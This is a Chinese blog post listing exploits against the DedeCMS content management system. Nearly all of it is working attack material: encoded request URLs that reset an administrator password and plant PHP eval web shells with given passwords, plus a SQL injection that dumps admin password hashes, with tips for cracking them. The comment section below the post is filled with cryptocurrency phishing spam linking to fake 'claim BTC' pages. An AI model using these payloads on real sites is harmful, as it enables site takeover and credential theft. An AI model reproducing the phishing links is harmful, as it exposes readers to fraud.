小灰博客--小灰IT技术博客 | sky00.com

dedecms漏洞总汇

1、修改任意管理员漏洞

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95
&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105
&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96
&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117
&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61
&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114
&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96
&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53
&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56
&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32
&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105
&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 
如果不出问题,后台登录用户spider密码admin
2、生成一句话
EXP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95
&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105
&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96
&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110
&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100
&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123
&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104
&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95
&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110
&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39
&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39
&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112
&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108
&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91
&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39
&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101
&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87
&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105
&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35
update成功后,访问下http://127.0.0.1/plus/mytag_js.php?aid=1
会在plus目录生成 x.php   一句话密码 m
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)
3、一句话
EXP:
1
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96

成功增加。

访问http://www.xxx.com/plus/mytag_js.php?aid=9013
生成一句话木马.
菜刀连接http://www.xxx.com/plus/90sec.php  密码 guige

影响到的版本如下:
6597994455937003599
查看dedecms版本的方法:http://www.xxx.com/data/admin/ver.txt
最后发一个2014最新的终极注入:
1
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
爆出来的20位MD5 减掉前三位和最后一位  剩下的16位破解!

如果该文章帮到了您,不妨帮忙分享支持下博主!
同时也欢迎各位技术爱好者加入IT技术群(点击即可):70035098 互相交流学习!

分享该文章到:


发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

分类

最新评论

  • Account Update - 0.8 Bitcoin pending. Complete reception => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:8d2k3q
  • Wallet Update: 1.1 Bitcoin detected. Secure reception => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=ed01c6ff34c4c03bef232f081436351d&:khhi76
  • Wallet Alert: 1.1 BTC pending. Secure reception => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=7512ee157075b7eeb1085dde75977f00&:s98h7m
  • Account Update: 0.33 BTC credited. Finalize reception > https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=82b659c095cace05cbef312726b6e1d9&:nvswei
  • Wallet Notification: 0.8 BTC pending. Secure reception > https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=d9564a149cf7ebbc725fcfce1bd3d512&:dajazp
  • Wallet Update - 0.33 Bitcoin credited. Complete transfer => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=2ae440781044702fe525e5a4bc609633&:pjv6ww
  • ALERT: You got 0.75 bitcoin! Tap to claim → https://graph.org/RECEIVE-BTC-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:wmec98
  • ❗ ALERT: You got 3.0 BTC! Go to receive >> https://graph.org/RECEIVE-BTC-07-23?hs=281dba697024abd3d1c5d7176ade2d86&:03bbv7
  • WARNING - You received 0.75 BTC! Tap to receive > https://graph.org/RECEIVE-BTC-07-23?hs=82b659c095cace05cbef312726b6e1d9&:r4r9ao
  • ⚠️ ATTENTION - You received 3.0 BTC! Click to receive → https://graph.org/RECEIVE-BTC-07-23?hs=d9564a149cf7ebbc725fcfce1bd3d512&:cdu1wo
  • ⚠️ ATTENTION: You received 3.0 BTC! Go to claim → https://graph.org/RECEIVE-BTC-07-23?hs=ca0101c3d55bddd4fc83ad439009f81a&:kn09t3
  • SECURITY UPDATE - Suspicious transfer of 1.5 BTC. Cancel? >> https://graph.org/COLLECT-BTC-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:upxwyz
  • ACCOUNT NOTICE: Suspicious transfer of 0.9 Bitcoin. Cancel? >> https://graph.org/COLLECT-BTC-07-23?hs=fe6091958be4c38fa81e31741d9ee97b&:4pf2ee
  • ACCOUNT ALERT - Unauthorized transaction of 2.0 Bitcoin. Block? >> https://graph.org/COLLECT-BTC-07-23?hs=16de53a4a2394494df77c8bcee6cad77&:h5il57
  • WALLET UPDATE: Suspicious transfer of 2.0 BTC. Stop? > https://graph.org/COLLECT-BTC-07-23?hs=3f08de96112b4bab631df916e9c95f9e&:puykif
  • SECURITY UPDATE - Unauthorized transaction of 0.9 BTC. Stop? > https://graph.org/COLLECT-BTC-07-23?hs=2ae440781044702fe525e5a4bc609633&:jeu7qm
  • + 1.463083 BTC.NEXT - https://graph.org/Payout-from-Blockchaincom-06-26?hs=9e710a17c6f1893b8975843ad65a53ec&:deoope
  • Notification; SENDING 1.340434 BTC. Assure => https://graph.org/Payout-from-Blockchaincom-06-26?hs=281dba697024abd3d1c5d7176ade2d86&:9no7ye
  • + 1.741870 BTC.NEXT - https://graph.org/Payout-from-Blockchaincom-06-26?hs=82b659c095cace05cbef312726b6e1d9&:ktokt2
  • + 1.869464 BTC.NEXT - https://graph.org/Payout-from-Blockchaincom-06-26?hs=d9564a149cf7ebbc725fcfce1bd3d512&:8u5u17